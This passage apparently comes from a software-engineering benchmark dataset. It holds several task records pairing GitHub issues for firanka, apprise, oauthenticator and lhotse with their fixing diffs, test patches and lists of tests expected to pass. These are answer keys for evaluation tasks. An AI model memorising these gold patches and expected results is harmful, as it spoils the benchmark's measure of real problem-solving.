+ raise ValueError('Modulo series cannot have a period of 0')
+ elif math.isinf(self.period):
+ raise ValueError('Modulo series cannot have an infinite period')
+
+ def _get_for(self, item):
+ if item < 0:
+ item = -(item // self.period) * self.period + item
+ elif item > self.period:
+ item = item - (item // self.period) * self.period
+ elif item == self.period:
+ item = 0
+
+ return self.series._get_for(self.series.domain.start + item)
diff --git a/firanka/timeproviders.py b/firanka/timeproviders.py
index 2cca5f4..47dbd0c 100644
--- a/firanka/timeproviders.py
+++ b/firanka/timeproviders.py
@@ -1,10 +1,8 @@
# coding=UTF-8
from __future__ import print_function, absolute_import, division
-import six
-import logging
-from .series import Series
from .ranges import Range
+from .series import Series
class BijectionMapping(object):
|
smok-serwis/firanka
|
5888250487fd93c5251a0dfafd6173895e599550
|
diff --git a/tests/test_range.py b/tests/test_range.py
index 5463f90..c8bc935 100644
--- a/tests/test_range.py
+++ b/tests/test_range.py
@@ -1,6 +1,8 @@
# coding=UTF-8
from __future__ import print_function, absolute_import, division
+
import unittest
+
from firanka.ranges import Range
@@ -38,7 +40,7 @@ class TestRange(unittest.TestCase):
def test_str_and_repr_and_bool(self):
p = Range(-1, 1, True, True)
self.assertEqual(eval(repr(p)), p)
- self.assertEqual(str(Range(-1, 1, True, True)), '<-1;1>')
+ self.assertEqual(str(Range(-1, 1)), '<-1;1>')
def test_constructor(self):
self.assertRaises(ValueError, lambda: Range('#2;3>'))
diff --git a/tests/test_series.py b/tests/test_series.py
index 8b8a022..94d73bc 100644
--- a/tests/test_series.py
+++ b/tests/test_series.py
@@ -1,11 +1,13 @@
# coding=UTF-8
from __future__ import print_function, absolute_import, division
-import six
+
import math
import unittest
-from firanka.series import DiscreteSeries, FunctionSeries, ModuloSeries
-from firanka.ranges import Range
+
from firanka.exceptions import NotInDomainError
+from firanka.ranges import Range
+from firanka.series import DiscreteSeries, FunctionSeries, ModuloSeries, \
+ LinearInterpolationSeries
NOOP = lambda x: x
@@ -174,3 +176,18 @@ class TestModuloSeries(unittest.TestCase):
ser2 = FunctionSeries(NOOP, '<0;3)')
ser3 = ser1.join(ser2, lambda x, y: x * y)
+
+
+class TestLinearInterpolation(unittest.TestCase):
+ def test_lin(self):
+ series = LinearInterpolationSeries(
+ DiscreteSeries([(0, 1), (1, 2), (2, 3)], '<0;3)'))
+
+ self.assertEqual(series[0], 1)
+ self.assertEqual(series[0.5], 1.5)
+ self.assertEqual(series[1], 2)
+ self.assertEqual(series[2.3], 3)
+
+ def test_conf(self):
+ self.assertRaises(TypeError, lambda: LinearInterpolationSeries(
+ FunctionSeries(NOOP, '<0;3)')))
diff --git a/tests/test_timeproviders.py b/tests/test_timeproviders.py
index d6d0d78..87bc595 100644
--- a/tests/test_timeproviders.py
+++ b/tests/test_timeproviders.py
@@ -1,6 +1,6 @@
# coding=UTF-8
from __future__ import print_function, absolute_import, division
-import six
+
import unittest
from firanka.series import DiscreteSeries
|
Add a linear interpolation series
Much like `DiscreteSeries` but can perform linear interpolation
|
0.0
|
5888250487fd93c5251a0dfafd6173895e599550
|
[
"tests/test_range.py::TestRange::test_constructor",
"tests/test_range.py::TestRange::test_contains",
"tests/test_range.py::TestRange::test_intersection",
"tests/test_range.py::TestRange::test_isempty",
"tests/test_range.py::TestRange::test_slicing",
"tests/test_range.py::TestRange::test_str_and_repr_and_bool",
"tests/test_series.py::TestDiscreteSeries::test_apply",
"tests/test_series.py::TestDiscreteSeries::test_base",
"tests/test_series.py::TestDiscreteSeries::test_discretize",
"tests/test_series.py::TestDiscreteSeries::test_eval",
"tests/test_series.py::TestDiscreteSeries::test_eval2",
"tests/test_series.py::TestDiscreteSeries::test_eval3",
"tests/test_series.py::TestDiscreteSeries::test_slice",
"tests/test_series.py::TestDiscreteSeries::test_slice_outdomain",
"tests/test_series.py::TestDiscreteSeries::test_translation",
"tests/test_series.py::TestDiscreteSeries::test_uncov",
"tests/test_series.py::TestFunctionSeries::test_apply",
"tests/test_series.py::TestFunctionSeries::test_domain_sensitivity",
"tests/test_series.py::TestFunctionSeries::test_slice",
"tests/test_series.py::TestModuloSeries::test_base",
"tests/test_series.py::TestModuloSeries::test_comp_discrete",
"tests/test_series.py::TestModuloSeries::test_exceptions",
"tests/test_series.py::TestLinearInterpolation::test_conf",
"tests/test_series.py::TestLinearInterpolation::test_lin",
"tests/test_timeproviders.py::TestTimeproviders::test_base"
] |
[] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_added_files",
"has_many_modified_files",
"has_many_hunks",
"has_pytest_match_arg"
],
"has_test_patch": true,
"is_lite": false
}
|
2017-12-09 07:47:03+00:00
|
mit
| 5,569
|
|
caronc__apprise-324
|
diff --git a/.gitignore b/.gitignore
index 11f190a..0315c5b 100644
--- a/.gitignore
+++ b/.gitignore
@@ -67,3 +67,8 @@ target/
#PyCharm
.idea
+
+#PyDev (Eclipse)
+.project
+.pydevproject
+.settings
diff --git a/apprise/utils.py b/apprise/utils.py
index 21f2c49..4b4833b 100644
--- a/apprise/utils.py
+++ b/apprise/utils.py
@@ -120,9 +120,9 @@ GET_EMAIL_RE = re.compile(
r'(?P<email>(?P<userid>[a-z0-9$%=_~-]+'
r'(?:\.[a-z0-9$%+=_~-]+)'
r'*)@(?P<domain>('
- r'(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+'
- r'[a-z0-9](?:[a-z0-9-]*[a-z0-9]))|'
- r'[a-z0-9][a-z0-9-]{5,})))'
+ r'(?:[a-z0-9](?:[a-z0-9_-]*[a-z0-9])?\.)+'
+ r'[a-z0-9](?:[a-z0-9_-]*[a-z0-9]))|'
+ r'[a-z0-9][a-z0-9_-]{5,})))'
r'\s*>?', re.IGNORECASE)
# Regular expression used to extract a phone number
@@ -232,9 +232,12 @@ def is_hostname(hostname, ipv4=True, ipv6=True):
# - Hostnames can ony be comprised of alpha-numeric characters and the
# hyphen (-) character.
# - Hostnames can not start with the hyphen (-) character.
+ # - as a workaround for https://github.com/docker/compose/issues/229 to
+ # being able to address services in other stacks, we also allow
+ # underscores in hostnames
# - labels can not exceed 63 characters
allowed = re.compile(
- r'(?!-)[a-z0-9][a-z0-9-]{1,62}(?<!-)$',
+ r'^[a-z0-9][a-z0-9_-]{1,62}(?<!-)$',
re.IGNORECASE,
)
|
caronc/apprise
|
2c2722f61f9f983827c8246943f0462098e5a0ed
|
diff --git a/test/test_utils.py b/test/test_utils.py
index b187da0..37c2ba7 100644
--- a/test/test_utils.py
+++ b/test/test_utils.py
@@ -532,6 +532,8 @@ def test_is_hostname():
assert utils.is_hostname('yahoo.ca.') == 'yahoo.ca'
assert utils.is_hostname('valid-dashes-in-host.ca') == \
'valid-dashes-in-host.ca'
+ assert utils.is_hostname('valid-underscores_in_host.ca') == \
+ 'valid-underscores_in_host.ca'
# Invalid Hostnames
assert utils.is_hostname('-hostname.that.starts.with.a.dash') is False
@@ -539,7 +541,6 @@ def test_is_hostname():
assert utils.is_hostname(' spaces ') is False
assert utils.is_hostname(' ') is False
assert utils.is_hostname('') is False
- assert utils.is_hostname('valid-underscores_in_host.ca') is False
# Valid IPv4 Addresses
assert utils.is_hostname('127.0.0.1') == '127.0.0.1'
@@ -625,6 +626,14 @@ def test_is_email():
assert 'test' == results['user']
assert '' == results['label']
+ results = utils.is_email('test@my-valid_host.com')
+ assert '' == results['name']
+ assert 'test@my-valid_host.com' == results['email']
+ assert 'test@my-valid_host.com' == results['full_email']
+ assert 'my-valid_host.com' == results['domain']
+ assert 'test' == results['user']
+ assert '' == results['label']
+
results = utils.is_email('tag+test@gmail.com')
assert '' == results['name']
assert 'test@gmail.com' == results['email']
|
'Unparseable E-Mail URL' error for hostnames containing underscore
With underscore:
```bash
$ docker run --rm caronc/apprise:latest /usr/local/bin/apprise --body='hello world' \
'mailto://smtp_service:25/?from=foo@localhost&to=bar@localhost'
2020-11-22 16:33:16,297 - ERROR - Unparseable E-Mail URL mailto://smtp_service:25/?from=foo@localhost&to=bar@localhost
2020-11-22 16:33:16,297 - ERROR - You must specify at least one server URL or populated configuration file.
```
Without underscore:
```bash
$ docker run --rm caronc/apprise:latest /usr/local/bin/apprise --body='hello world' \
'mailto://smtpservice:25/?from=foo@localhost&to=bar@localhost'
2020-11-22 16:34:12,541 - INFO - Notifying 1 service(s) asynchronously.
```
Underscores in hostnames are completely legal, see https://stackoverflow.com/a/2183140/5116073
|
0.0
|
2c2722f61f9f983827c8246943f0462098e5a0ed
|
[
"test/test_utils.py::test_is_hostname",
"test/test_utils.py::test_is_email"
] |
[
"test/test_utils.py::test_parse_qsd",
"test/test_utils.py::test_parse_url",
"test/test_utils.py::test_parse_bool",
"test/test_utils.py::test_is_ipaddr",
"test/test_utils.py::test_parse_emails",
"test/test_utils.py::test_parse_urls",
"test/test_utils.py::test_parse_list",
"test/test_utils.py::test_exclusive_match",
"test/test_utils.py::test_apprise_validate_regex",
"test/test_utils.py::test_environ_temporary_change",
"test/test_utils.py::test_apply_templating"
] |
{
"failed_lite_validators": [
"has_hyperlinks",
"has_many_modified_files"
],
"has_test_patch": true,
"is_lite": false
}
|
2020-11-22 17:34:28+00:00
|
mit
| 1,504
|
|
jupyterhub__oauthenticator-449
|
diff --git a/docs/source/github.md b/docs/source/github.md
index d5e2663..170b51e 100644
--- a/docs/source/github.md
+++ b/docs/source/github.md
@@ -39,3 +39,33 @@ To use this expanded user information, you will need to subclass your
current spawner and modify the subclass to read these fields from
`auth_state` and then use this information to provision your Notebook or
Lab user.
+
+## Restricting access
+
+### Organizations
+
+If you would like to restrict access to members of specific GitHub organizations
+you can pass a list of organization names to `allowed_organizations`.
+
+For example, the below will ensure that only members of `org_a` or
+`org_b` will be authorized to access.
+
+`c.GitHubOAuthenticator.allowed_organizations = ["org_a", "org_b"]`
+
+### Teams
+
+It is also possible to restrict access to members of specific teams within
+organizations using the syntax: `<organization>:<team-name>`.
+
+For example, the below will only allow members of `org_a`, or
+`team_1` in `org_b` access. Members of `org_b` but not `team_1` will be
+unauthorized to access.
+
+`c.GitHubOAuthenticator.allowed_organizations = ["org_a", "org_b:team_1"]`
+
+### Notes
+
+- Restricting access by either organization or team requires the `read:org`
+ scope
+- Ensure you use the organization/team name as it appears in the GitHub url
+ - E.g. Use `jupyter` instead of `Project Jupyter`
diff --git a/oauthenticator/github.py b/oauthenticator/github.py
index e29777d..9526b1f 100644
--- a/oauthenticator/github.py
+++ b/oauthenticator/github.py
@@ -225,13 +225,13 @@ class GitHubOAuthenticator(OAuthenticator):
headers = _api_headers(access_token)
# Check membership of user `username` for organization `org` via api [check-membership](https://developer.github.com/v3/orgs/members/#check-membership)
# With empty scope (even if authenticated by an org member), this
- # will only await public org members. You want 'read:org' in order
- # to be able to iterate through all members.
- check_membership_url = "%s/orgs/%s/members/%s" % (
- self.github_api,
- org,
- username,
- )
+ # will only await public org members. You want 'read:org' in order
+ # to be able to iterate through all members. If you would only like to
+ # allow certain teams within an organisation, specify
+ # allowed_organisations = {org_name:team_name}
+
+ check_membership_url = self._build_check_membership_url(org, username)
+
req = HTTPRequest(
check_membership_url,
method="GET",
@@ -260,6 +260,13 @@ class GitHubOAuthenticator(OAuthenticator):
)
return False
+ def _build_check_membership_url(self, org: str, username: str) -> str:
+ if ":" in org:
+ org, team = org.split(":")
+ return f"{self.github_api}/orgs/{org}/teams/{team}/members/{username}"
+ else:
+ return f"{self.github_api}/orgs/{org}/members/{username}"
+
class LocalGitHubOAuthenticator(LocalAuthenticator, GitHubOAuthenticator):
|
jupyterhub/oauthenticator
|
d8ea0b6f11dbc3dac35aada9d17aef6ccd2da6a4
|
diff --git a/oauthenticator/tests/test_github.py b/oauthenticator/tests/test_github.py
index 0211cd4..16c04c9 100644
--- a/oauthenticator/tests/test_github.py
+++ b/oauthenticator/tests/test_github.py
@@ -7,6 +7,7 @@ from urllib.parse import parse_qs
from urllib.parse import urlparse
from pytest import fixture
+from pytest import mark
from tornado.httpclient import HTTPResponse
from tornado.httputil import HTTPHeaders
from traitlets.config import Config
@@ -71,40 +72,42 @@ async def test_allowed_org_membership(github_client):
## Mock Github API
- teams = {
+ orgs = {
'red': ['grif', 'simmons', 'donut', 'sarge', 'lopez'],
'blue': ['tucker', 'caboose', 'burns', 'sheila', 'texas'],
}
+ org_teams = {'blue': {'alpha': ['tucker', 'caboose', 'burns']}}
+
member_regex = re.compile(r'/orgs/(.*)/members')
- def team_members(paginate, request):
+ def org_members(paginate, request):
urlinfo = urlparse(request.url)
- team = member_regex.match(urlinfo.path).group(1)
+ org = member_regex.match(urlinfo.path).group(1)
- if team not in teams:
+ if org not in orgs:
return HTTPResponse(request, 404)
if not paginate:
- return [user_model(m) for m in teams[team]]
+ return [user_model(m) for m in orgs[org]]
else:
page = parse_qs(urlinfo.query).get('page', ['1'])
page = int(page[0])
- return team_members_paginated(
- team, page, urlinfo, functools.partial(HTTPResponse, request)
+ return org_members_paginated(
+ org, page, urlinfo, functools.partial(HTTPResponse, request)
)
- def team_members_paginated(team, page, urlinfo, response):
- if page < len(teams[team]):
+ def org_members_paginated(org, page, urlinfo, response):
+ if page < len(orgs[org]):
headers = make_link_header(urlinfo, page + 1)
- elif page == len(teams[team]):
+ elif page == len(orgs[org]):
headers = {}
else:
return response(400)
headers.update({'Content-Type': 'application/json'})
- ret = [user_model(teams[team][page - 1])]
+ ret = [user_model(orgs[org][page - 1])]
return response(
200,
@@ -112,19 +115,42 @@ async def test_allowed_org_membership(github_client):
buffer=BytesIO(json.dumps(ret).encode('utf-8')),
)
- membership_regex = re.compile(r'/orgs/(.*)/members/(.*)')
+ org_membership_regex = re.compile(r'/orgs/(.*)/members/(.*)')
- def team_membership(request):
+ def org_membership(request):
urlinfo = urlparse(request.url)
- urlmatch = membership_regex.match(urlinfo.path)
- team = urlmatch.group(1)
+ urlmatch = org_membership_regex.match(urlinfo.path)
+ org = urlmatch.group(1)
username = urlmatch.group(2)
- print('Request team = %s, username = %s' % (team, username))
- if team not in teams:
- print('Team not found: team = %s' % (team))
+ print('Request org = %s, username = %s' % (org, username))
+ if org not in orgs:
+ print('Org not found: org = %s' % (org))
+ return HTTPResponse(request, 404)
+ if username not in orgs[org]:
+ print('Member not found: org = %s, username = %s' % (org, username))
return HTTPResponse(request, 404)
- if username not in teams[team]:
- print('Member not found: team = %s, username = %s' % (team, username))
+ return HTTPResponse(request, 204)
+
+ team_membership_regex = re.compile(r'/orgs/(.*)/teams/(.*)/members/(.*)')
+
+ def team_membership(request):
+ urlinfo = urlparse(request.url)
+ urlmatch = team_membership_regex.match(urlinfo.path)
+ org = urlmatch.group(1)
+ team = urlmatch.group(2)
+ username = urlmatch.group(3)
+ print('Request org = %s, team = %s username = %s' % (org, team, username))
+ if org not in orgs:
+ print('Org not found: org = %s' % (org))
+ return HTTPResponse(request, 404)
+ if team not in org_teams[org]:
+ print('Team not found in org: team = %s, org = %s' % (team, org))
+ return HTTPResponse(request, 404)
+ if username not in org_teams[org][team]:
+ print(
+ 'Member not found: org = %s, team = %s, username = %s'
+ % (org, team, username)
+ )
return HTTPResponse(request, 404)
return HTTPResponse(request, 204)
@@ -132,8 +158,9 @@ async def test_allowed_org_membership(github_client):
for paginate in (False, True):
client_hosts = client.hosts['api.github.com']
- client_hosts.append((membership_regex, team_membership))
- client_hosts.append((member_regex, functools.partial(team_members, paginate)))
+ client_hosts.append((team_membership_regex, team_membership))
+ client_hosts.append((org_membership_regex, org_membership))
+ client_hosts.append((member_regex, functools.partial(org_members, paginate)))
authenticator.allowed_organizations = ['blue']
@@ -156,10 +183,42 @@ async def test_allowed_org_membership(github_client):
user = await authenticator.authenticate(handler)
assert user['name'] == 'donut'
+ # test team membership
+ authenticator.allowed_organizations = ['blue:alpha', 'red']
+
+ handler = client.handler_for_user(user_model('tucker'))
+ user = await authenticator.authenticate(handler)
+ assert user['name'] == 'tucker'
+
+ handler = client.handler_for_user(user_model('grif'))
+ user = await authenticator.authenticate(handler)
+ assert user['name'] == 'grif'
+
+ handler = client.handler_for_user(user_model('texas'))
+ user = await authenticator.authenticate(handler)
+ assert user is None
+
client_hosts.pop()
client_hosts.pop()
+@mark.parametrize(
+ "org, username, expected",
+ [
+ ("blue", "texas", "https://api.github.com/orgs/blue/members/texas"),
+ (
+ "blue:alpha",
+ "tucker",
+ "https://api.github.com/orgs/blue/teams/alpha/members/tucker",
+ ),
+ ("red", "grif", "https://api.github.com/orgs/red/members/grif"),
+ ],
+)
+def test_build_check_membership_url(org, username, expected):
+ output = GitHubOAuthenticator()._build_check_membership_url(org, username)
+ assert output == expected
+
+
def test_deprecated_config(caplog):
cfg = Config()
cfg.GitHubOAuthenticator.github_organization_whitelist = ["jupy"]
|
[GitHub] We can authorize organizations, but what about teams within them?
Currently GitHub authentication is setup to whitelist individual users or entire organizations:
https://github.com/jupyterhub/oauthenticator/blob/master/oauthenticator/github.py
See here for the implementation:
https://zero-to-jupyterhub.readthedocs.io/en/latest/authentication.html?highlight=auth#github
It would be great to be able to whitelist Teams within a given organization:
https://developer.github.com/v3/teams/members/#get-team-membership
We are currently creating many new organizations on github for week-long tutorials to grant time-limited access to hubs. Having team-based authentication could help with a few scenarios:
1) medium/large github organizations with application-specific hubs (https://github.com/pangeo-data)
2) could also be a really useful feature for resource access based on team membership within a hub (for example, mapping team name to group id)?
|
0.0
|
d8ea0b6f11dbc3dac35aada9d17aef6ccd2da6a4
|
[
"oauthenticator/tests/test_github.py::test_build_check_membership_url[blue-texas-https://api.github.com/orgs/blue/members/texas]",
"oauthenticator/tests/test_github.py::test_build_check_membership_url[blue:alpha-tucker-https://api.github.com/orgs/blue/teams/alpha/members/tucker]",
"oauthenticator/tests/test_github.py::test_build_check_membership_url[red-grif-https://api.github.com/orgs/red/members/grif]"
] |
[
"oauthenticator/tests/test_github.py::test_deprecated_config"
] |
{
"failed_lite_validators": [
"has_hyperlinks",
"has_many_modified_files"
],
"has_test_patch": true,
"is_lite": false
}
|
2021-08-04 15:03:45+00:00
|
bsd-3-clause
| 3,376
|
|
lhotse-speech__lhotse-724
|
diff --git a/lhotse/dataset/sampling/bucketing.py b/lhotse/dataset/sampling/bucketing.py
index 04541b37..a2ad7ba3 100644
--- a/lhotse/dataset/sampling/bucketing.py
+++ b/lhotse/dataset/sampling/bucketing.py
@@ -422,23 +422,55 @@ def _create_buckets_equal_duration_single(
"""
total_duration = np.sum(c.duration for c in cuts)
bucket_duration = total_duration / num_buckets
- iter_cuts = iter(cuts)
- buckets = []
- for bucket_idx in range(num_buckets):
- bucket = []
- current_duration = 0
- try:
- while current_duration < bucket_duration:
- bucket.append(next(iter_cuts))
- current_duration += bucket[-1].duration
- # Every odd bucket, take the cut that exceeded the bucket's duration
- # and put it in the front of the iterable, so that it goes to the
- # next bucket instead. It will ensure that the last bucket is not too
- # thin (otherwise all the previous buckets are a little too large).
- if bucket_idx % 2:
- last_cut = bucket.pop()
- iter_cuts = chain([last_cut], iter_cuts)
- except StopIteration:
- assert bucket_idx == num_buckets - 1
- buckets.append(CutSet.from_cuts(bucket))
+ # Define the order for adding cuts. We start at the beginning, then go to
+ # the end, and work our way to the middle. Once in the middle we distribute
+ # excess cuts among the two buckets close to the median duration. This
+ # handles the problem of where to place cuts that caused previous buckets
+ # to "over-flow" without sticking all of them in the last bucket, which
+ # causes one large bucket at the end and also places many small duration
+ # cuts with longer ones.
+ order = list(range(0, len(cuts), 2)) + list(
+ range(len(cuts) - (1 + len(cuts) % 2), 0, -2)
+ )
+ order2idx = {o_idx: i for i, o_idx in enumerate(order)}
+ durations = [c.duration for c in cuts]
+
+ # We need a list of the cut durations in the same order (0, N-1, 1, N-2, ...)
+ ordered_cut_durations = sorted(zip(order, durations), key=lambda x: x[0])
+ last_order, first_bucket = 0, 0
+ last_bucket = num_buckets - 1
+ buckets_dict = {i: 0 for i in range(num_buckets)}
+ buckets_cut_dict = {i: [] for i in range(num_buckets)}
+ middle_bucket = None
+ idx_to_bucket_id = {}
+ for i, (order_idx, duration) in enumerate(ordered_cut_durations, 1):
+ # Check if we are at the middle bucket. first_bucket is the left bucket
+ # we are processing. last_bucket is the right bucket. When they are the
+ # same we are filling the bucket with cuts near the median duration.
+ if middle_bucket is None and first_bucket == last_bucket:
+ middle_bucket = first_bucket
+
+ # i % 2 = 1 ==> process the left_bucket (first_bucket)
+ if i % 2:
+ if buckets_dict[first_bucket] + duration > bucket_duration:
+ if middle_bucket is not None and first_bucket == middle_bucket:
+ first_bucket = min(middle_bucket - 1, num_buckets - 1)
+ else:
+ first_bucket = min(first_bucket + 1, num_buckets - 1)
+ buckets_dict[first_bucket] += duration
+ idx_to_bucket_id[order2idx[order_idx]] = first_bucket
+ # i % 2 = 0 ==> process the right bucket (last_bucket)
+ else:
+ if buckets_dict[last_bucket] + duration > bucket_duration:
+ if middle_bucket is not None and last_bucket == middle_bucket:
+ last_bucket = max(middle_bucket + 1, 0)
+ else:
+ last_bucket = max(last_bucket - 1, 0)
+ buckets_dict[last_bucket] += duration
+ idx_to_bucket_id[order2idx[order_idx]] = last_bucket
+
+ # Now that buckets have been assigned, create the new cutset.
+ for cut_idx, cut in enumerate(cuts):
+ buckets_cut_dict[idx_to_bucket_id[cut_idx]].append(cut)
+ buckets = [CutSet.from_cuts(buckets_cut_dict[i]) for i in range(num_buckets)]
return buckets
|
lhotse-speech/lhotse
|
1c137cf491f835dca25be92d5bf89272ec37b8fe
|
diff --git a/test/dataset/sampling/test_sampling.py b/test/dataset/sampling/test_sampling.py
index 4c922d40..1ed453ef 100644
--- a/test/dataset/sampling/test_sampling.py
+++ b/test/dataset/sampling/test_sampling.py
@@ -467,19 +467,29 @@ def test_bucketing_sampler_single_cuts_equal_duration():
)
# Ensure that each consecutive bucket has less cuts than the previous one
- prev_len = float("inf")
- bucket_cum_durs = []
+ sampled_cuts, bucket_cum_durs = [], []
+ prev_min, prev_max = 0, 0
+ num_overlapping_bins = 0
for (bucket,) in sampler.buckets:
- bucket_cum_durs.append(sum(c.duration for c in bucket))
- curr_len = len(bucket)
- assert curr_len < prev_len
- prev_len = curr_len
+ bucket_durs = [c.duration for c in bucket]
+ sampled_cuts.extend(c for c in bucket)
+ bucket_cum_durs.append(sum(bucket_durs))
+ bucket_min, bucket_max = min(bucket_durs), max(bucket_durs)
+ # Ensure that bucket lengths do not overlap, except for the middle
+ # 3 buckets maybe
+ if prev_max > bucket_min:
+ num_overlapping_bins += 1
+ assert num_overlapping_bins < 3
+ prev_min = bucket_min
+ prev_max = bucket_max
# Assert that all bucket cumulative durations are within 1/10th of the mean
mean_bucket_dur = mean(bucket_cum_durs) # ~ 1300s
for d in bucket_cum_durs:
assert abs(d - mean_bucket_dur) < 0.1 * mean_bucket_dur
+ assert set(cut_set.ids) == set(c.id for c in sampled_cuts)
+
def test_bucketing_sampler_shuffle():
cut_set = DummyManifest(CutSet, begin_id=0, end_id=10)
|
BucketingSampler with equal_duration drops an arbitrary(?) number of cuts.
If you use the BucketingSampler with num_buckets, especially with even number of buckets, though I think you can also get it to work for an odd number of buckets, at the very least the last cut is dropped, but if you choose the durations and num_buckets appropriate you can have many more dropped.
The reason this is not caught in the test is that the line
`assert set(cut_set.ids) == set(c.id for c in sampled_cuts)`
is only called for the equal_length method and not the equal_duration method.
The problem arises from the fact that the loops in _create_buckets_equal_duration_single() are not over the cuts, but are instead over the buckets and the duration over the buckets. Because you pop the last cut off of the odd buckets and put it back at the front, you can be left with a non-empty iterator.
At the very least the BucketingSampler equal_duration feature should be updated with a warning when using it and print out the number of cuts it has dropped. Many times it will be 0, or 1.
However, if modify
`def test_bucketing_sampler_single_cuts():
cut_set = DummyManifest(CutSet, begin_id=0, end_id=1000)
sampler = BucketingSampler(cut_set, sampler_type=SimpleCutSampler, bucket_method="equal_duration", num_buckets=500)
print(f'Num cuts orig: {len(cut_set)}, Num cuts in sampler: {sum(len(b[0]) for b in sampler.buckets)}')
sampled_cuts = []
for batch in sampler:
sampled_cuts.extend(batch)
assert set(cut_set.ids) == set(c.id for c in sampled_cuts)`
in test/dataset/sampling/test_sampling.py to look like what you have above, you will see that in that example it drops 25% of the cuts.
|
0.0
|
1c137cf491f835dca25be92d5bf89272ec37b8fe
|
[
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_single_cuts_equal_duration"
] |
[
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_shuffling[SimpleCutSampler]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_shuffling[SingleCutSampler]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_shuffling[DynamicCutSampler]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_time_constraints[None-None-None-exception_expectation0]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_time_constraints[10.0-None-None-exception_expectation1]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_time_constraints[None-1000-None-exception_expectation2]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_time_constraints[None-None-160000-exception_expectation3]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_time_constraints[None-1000-160000-exception_expectation4]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_time_constraints[5.0-1000-160000-exception_expectation5]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_order_is_deterministic_given_epoch[SimpleCutSampler]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_order_is_deterministic_given_epoch[DynamicCutSampler]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_order_differs_between_epochs[SimpleCutSampler]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_order_differs_between_epochs[DynamicCutSampler]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_low_max_frames[SimpleCutSampler]",
"test/dataset/sampling/test_sampling.py::test_single_cut_sampler_low_max_frames[DynamicCutSampler]",
"test/dataset/sampling/test_sampling.py::test_cut_pairs_sampler",
"test/dataset/sampling/test_sampling.py::test_dynamic_cut_sampler_as_cut_pairs_sampler",
"test/dataset/sampling/test_sampling.py::test_cut_pairs_sampler_2",
"test/dataset/sampling/test_sampling.py::test_cut_pairs_sampler_time_constraints[None-None-None-exception_expectation0]",
"test/dataset/sampling/test_sampling.py::test_cut_pairs_sampler_time_constraints[10.0-None-None-exception_expectation1]",
"test/dataset/sampling/test_sampling.py::test_cut_pairs_sampler_time_constraints[None-1000-None-exception_expectation2]",
"test/dataset/sampling/test_sampling.py::test_cut_pairs_sampler_time_constraints[None-None-160000-exception_expectation3]",
"test/dataset/sampling/test_sampling.py::test_cut_pairs_sampler_time_constraints[None-1000-160000-exception_expectation4]",
"test/dataset/sampling/test_sampling.py::test_cut_pairs_sampler_time_constraints[5.0-1000-160000-exception_expectation5]",
"test/dataset/sampling/test_sampling.py::test_cut_pairs_sampler_order_is_deterministic_given_epoch",
"test/dataset/sampling/test_sampling.py::test_cut_pairs_sampler_order_differs_between_epochs",
"test/dataset/sampling/test_sampling.py::test_concat_cuts",
"test/dataset/sampling/test_sampling.py::test_concat_cuts_with_duration_factor",
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_single_cuts",
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_single_cuts_no_proportional_sampling",
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_single_cuts_equal_len",
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_shuffle",
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_cut_pairs",
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_cut_pairs_equal_len[False]",
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_cut_pairs_equal_len[True]",
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_cut_pairs_equal_duration[False]",
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_cut_pairs_equal_duration[True]",
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_order_is_deterministic_given_epoch",
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_order_differs_between_epochs",
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_buckets_have_different_durations",
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_chooses_buckets_randomly",
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_time_constraints[constraint0]",
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_time_constraints[constraint1]",
"test/dataset/sampling/test_sampling.py::test_bucketing_sampler_time_constraints[constraint2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-995-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-995-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-995-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-996-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-996-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-996-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-997-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-997-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-997-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-998-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-998-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-998-4]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-999-2]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-999-3]",
"test/dataset/sampling/test_sampling.py::test_partitions_are_equal[SimpleCutSampler-999-4]",
